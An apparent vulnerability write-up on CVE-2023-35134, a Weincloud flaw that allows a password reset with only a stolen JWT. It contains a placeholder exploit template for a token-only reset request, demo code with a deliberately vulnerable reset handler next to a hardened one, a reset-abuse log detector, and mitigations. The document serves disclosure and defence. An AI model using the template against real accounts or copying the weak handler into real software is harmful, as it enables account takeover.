Weintek Weincloud v0.13.6 is affected by CVE-2023-35134, a weak password-recovery flaw that lets an attacker reset an account's password using nothing more than that account's JSON Web Token (JWT). Because a bearer token that is only meant to grant a temporary session can be converted into a permanent credential, any leaked or stolen token becomes a full account takeover, exposing the private account information and cloud data behind it. In this post we analyse the vulnerability, walk through an illustrative exploit snippet, and link to the original references.

Exploit Details

The weakness is in how Weincloud v0.13.6 implemented its password-reset flow. The reset endpoint treats the caller's JWT as sufficient proof of identity and asks for nothing else: not the account's current password, not a one-time code sent out of band, and not a fresh re-authentication. A JWT is a bearer credential, so whoever holds a valid token for an account, however it was obtained, can call the reset endpoint and choose a new password for that account. Two points follow. First, the token has to belong to the targeted account; the flaw does not let one user's token reset another user's password. Second, it turns a temporary, expiring session credential into permanent control: once the password is changed the attacker can log in normally and the legitimate user is locked out, so any token leak (a compromised browser, a token written to a log or a support ticket, an exposed backup) is as good as the password itself.

The following snippet illustrates the shape of the request. The host, the endpoint path and the body field name are placeholders, not Weincloud's published API, so treat it as a template for the attack rather than a drop-in exploit:

import requests

# Placeholder values: the host, path and body field are illustrative, not Weincloud's real API.
url = "https://weincloud.example.com/api/v.13.6/password/reset"
jwt_token = "Your_JWT_Token_Here"      # the target account's JWT, e.g. captured from a session
new_password = "New_Password_Here"

# The only credential presented is the bearer token: no current password, no reset code.
headers = {
    "Content-Type": "application/json",
    "Authorization": "Bearer {}".format(jwt_token),
}

data = {
    "password": new_password,
}

# json= serialises the body for us; the timeout stops a hung connection blocking the script.
response = requests.post(url, headers=headers, json=data, timeout=10)

if response.status_code == 200:
    print("Password reset successfully!")
else:
    print("Error resetting password:", response.status_code, response.text)

As the snippet shows, the attacker supplies only a valid JWT for the target account and the desired new password; the service changes the password without any further verification. Nothing in the request proves that the caller knows the current password or controls the account's registered contact channel, which is exactly the check a password-change flow exists to perform.
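To make the weakness and its fix concrete, here is an added example (my own code, not Weintek's and not the exploit above) of an in-memory account service with two reset endpoints: one that, like the Weincloud behaviour described above, checks only that the caller presents a valid JWT, and a hardened one that also requires the current password and revokes every token issued before the change. The JWT encoding, the claim names ("pwv" for password version), the usernames and the passwords are all assumptions made for the example:

```python
"""Added example, not Weintek's code: an in-memory account service that contrasts a
JWT-only password reset (the weakness described for Weincloud) with a hardened one."""
import base64, hashlib, hmac, json, os, time
from typing import Optional


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def issue_jwt(claims: dict, secret: bytes) -> str:
    """HS256 JWT: base64url(header).base64url(payload).base64url(HMAC-SHA256)."""
    header = _b64url(b'{"alg":"HS256","typ":"JWT"}')
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"

def verify_jwt(token: str, secret: bytes, now: Optional[float] = None) -> Optional[dict]:
    """Claims if the signature verifies under OUR key and the token is unexpired, else None."""
    try:
        header, payload, sig_b64 = token.split(".")
        sig, claims = _b64url_decode(sig_b64), json.loads(_b64url_decode(payload))
    except (ValueError, AttributeError):  # wrong part count, bad base64/JSON, or None
        return None
    # The header's "alg" is deliberately ignored: only HS256 under our key is accepted.
    expected = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig) or not isinstance(claims, dict):
        return None
    return None if claims.get("exp", 0) < (time.time() if now is None else now) else claims

def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


class UserStore:
    def __init__(self, secret: bytes):
        self.secret = secret
        self.users = {}  # username -> {"salt", "hash", "pwv"}; pwv counts password changes

    def set_password(self, username: str, password: str) -> None:
        """Create the account or overwrite its hash; pwv is deliberately left alone here."""
        salt = os.urandom(16)
        self.users.setdefault(username, {"pwv": 0}).update(salt=salt, hash=hash_password(password, salt))

    def check_password(self, username: str, password: str) -> bool:
        u = self.users.get(username)
        return u is not None and hmac.compare_digest(u["hash"], hash_password(password, u["salt"]))

    def login(self, username: str, password: str) -> Optional[str]:
        """One-hour session JWT bound to the password version current at login."""
        if not self.check_password(username, password):
            return None
        now = int(time.time())
        claims = {"sub": username, "pwv": self.users[username]["pwv"], "iat": now, "exp": now + 3600}
        return issue_jwt(claims, self.secret)

    def session_user(self, token: str) -> Optional[str]:
        """Username if the token is valid AND was issued after the last password change."""
        claims = verify_jwt(token, self.secret) or {}
        user = self.users.get(claims.get("sub"))
        return claims["sub"] if user and claims.get("pwv") == user["pwv"] else None

    def reset_password_weak(self, token: str, new_password: str) -> bool:
        """The Weincloud-style flaw: possession of a valid JWT is all that is checked."""
        claims = verify_jwt(token, self.secret)
        if claims is None or claims.get("sub") not in self.users:
            return False
        self.set_password(claims["sub"], new_password)
        return True  # no current password, no second factor, and old tokens stay valid

    def reset_password_hardened(self, token: str, current_password: str, new_password: str) -> bool:
        """Token names the account, the current password proves it, and bumping pwv
        revokes every token issued before the change (including any leaked copy)."""
        username = self.session_user(token)
        if username is None or not self.check_password(username, current_password):
            return False
        self.set_password(username, new_password)
        self.users[username]["pwv"] += 1
        return True


def run_scenarios() -> dict:
    """Attacker holds a leaked copy of alice's JWT and nothing else; two fresh stores.
    The dict entries are evaluated top to bottom, so order matters."""
    weak = UserStore(os.urandom(32))
    weak.set_password("alice", "Correct-Horse-1")
    stolen = weak.login("alice", "Correct-Horse-1")
    hard = UserStore(os.urandom(32))
    hard.set_password("alice", "Correct-Horse-1")
    token = hard.login("alice", "Correct-Horse-1")  # alice's own session; attacker has a copy
    return {
        "weak_reset_with_token_only": weak.reset_password_weak(stolen, "Attacker-Pw-9"),
        "weak_attacker_logs_in": weak.login("alice", "Attacker-Pw-9") is not None,
        "weak_owner_locked_out": weak.login("alice", "Correct-Horse-1") is None,
        "weak_stolen_token_still_valid": weak.session_user(stolen) == "alice",
        "hard_attacker_rejected": not hard.reset_password_hardened(token, "wrong-guess", "Attacker-Pw-9"),
        "hard_owner_reset_ok": hard.reset_password_hardened(token, "Correct-Horse-1", "Alice-New-2"),
        "hard_leaked_token_revoked": hard.session_user(token) is None,
        "hard_owner_logs_in_again": hard.login("alice", "Alice-New-2") is not None,
    }

if __name__ == "__main__":
    for check, result in run_scenarios().items():
        print(f"{check}: {result}")
```

Every entry of run_scenarios() comes back True. The weak handler shows why a token-only reset is an account-takeover primitive: the attacker's copy of the token both changes the password and keeps working afterwards. The hardened handler binds each token to the password version current at login, so a reset, even a legitimate one by the owner, invalidates the leaked copy. verify_jwt also never honours the header's alg field, so an unsigned alg=none token is rejected; that is a separate JWT pitfall, but one worth closing in the same code.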

Original References

CVE-2023-35134 was published in July 2023 through CISA's ICS advisory process and is recorded in the National Vulnerability Database (NVD). The NVD entry carries the CVSS v3 base score and vector string for the issue; check it there rather than relying on a figure quoted second-hand. The following links provide more detail:

- NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2023-35134
- Weintek Security Advisory: http://www.weintek.com/Security/Advisory/CVE-2023-35134

Mitigations and Recommendations

Weintek has acknowledged the vulnerability; check the vendor advisory for the Weincloud release that corrects it and update as soon as you can. Until the fix is in place, the following measures reduce the risk of exploitation:

- Treat Weincloud JWTs as credentials. Do not paste them into tickets, scripts or shared documents, do not log Authorization headers at proxies or load balancers, and log out rather than leaving browser sessions open, so that a token's useful lifetime is as short as possible.
- Regularly audit and monitor logs for suspicious access or password-reset activity: resets from a network location that never logged in, resets shortly after a login from a new address, or several resets for one account in a short window.
- Restrict which networks can reach the Weincloud account endpoints where your deployment allows it, so a stolen token is harder to replay from outside.

As always, stay current with the latest security advisories and patches to keep your systems protected.
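As an added illustration of the monitoring recommendation (my code, not Weintek's; I do not have Weincloud's real audit-log format, so the JSON-lines events, field names and sample addresses below are constructed), here is a small detector that correlates logins with password resets and flags the patterns a JWT-only reset would produce:

```python
"""Added example, not Weintek's code: a detector for suspicious password-reset activity
over constructed JSON-lines audit events (event and field names are assumptions)."""
import json
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed sample log. bob's token is replayed for two resets from an address that
# never logged in, and neither reset re-verified the current password.
SAMPLE_LOG = """
{"ts":"2023-07-20T08:00:00Z","event":"login","user":"alice","src_ip":"203.0.113.10","token_id":"t-1001"}
{"ts":"2023-07-20T08:05:00Z","event":"password_reset","user":"alice","src_ip":"203.0.113.10","token_id":"t-1001","current_pw_verified":true}
{"ts":"2023-07-20T09:00:00Z","event":"login","user":"bob","src_ip":"198.51.100.7","token_id":"t-1002"}
{"ts":"2023-07-20T09:30:00Z","event":"password_reset","user":"bob","src_ip":"192.0.2.55","token_id":"t-1002","current_pw_verified":false}
{"ts":"2023-07-20T09:31:00Z","event":"password_reset","user":"bob","src_ip":"192.0.2.55","token_id":"t-1002","current_pw_verified":false}
"""


def _parse_ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def detect_suspicious_resets(lines, burst_window=timedelta(minutes=10), burst_threshold=2):
    """Return one alert per password_reset event that trips any rule.

    Rules: (1) reset without current-password verification, i.e. the JWT-only flow;
    (2) reset from a source address different from the one the token was issued to;
    (3) token never seen at login (minted elsewhere, or login logging is missing);
    (4) burst_threshold or more resets for one user inside burst_window."""
    token_origin = {}                # token_id -> src_ip at login
    reset_times = defaultdict(list)  # user -> timestamps of resets seen so far
    alerts = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        ev = json.loads(raw)
        if ev["event"] == "login":
            token_origin[ev["token_id"]] = ev["src_ip"]
            continue
        if ev["event"] != "password_reset":
            continue
        ts = _parse_ts(ev["ts"])
        reasons = []
        if not ev.get("current_pw_verified", False):
            reasons.append("token_only_reset")
        origin = token_origin.get(ev["token_id"])
        if origin is None:
            reasons.append("token_without_login")
        elif origin != ev["src_ip"]:
            reasons.append(f"token_ip_mismatch:{origin}->{ev['src_ip']}")
        history = reset_times[ev["user"]]
        history.append(ts)
        recent = sum(1 for t in history if ts - t <= burst_window)
        if recent >= burst_threshold:
            reasons.append(f"reset_burst:{recent}")
        if reasons:
            alerts.append({"ts": ev["ts"], "user": ev["user"], "src_ip": ev["src_ip"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_suspicious_resets(SAMPLE_LOG.splitlines()):
        print(alert)
```

On the sample log alice's reset produces no alert, while both of bob's are flagged, the second one additionally as a burst. Rule (1) is the direct signature of this CVE being exercised; rules (2) and (4) catch the same abuse when the service does not record whether the current password was checked, because a stolen token is usually replayed from somewhere the victim never logged in, and attackers rarely stop at one reset. Tune burst_window and burst_threshold to your user base, and feed the detector the real field names once you know them.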

Timeline

Published on: 07/19/2023 22:15:00 UTC
Last modified on: 07/26/2023 16:18:00 UTC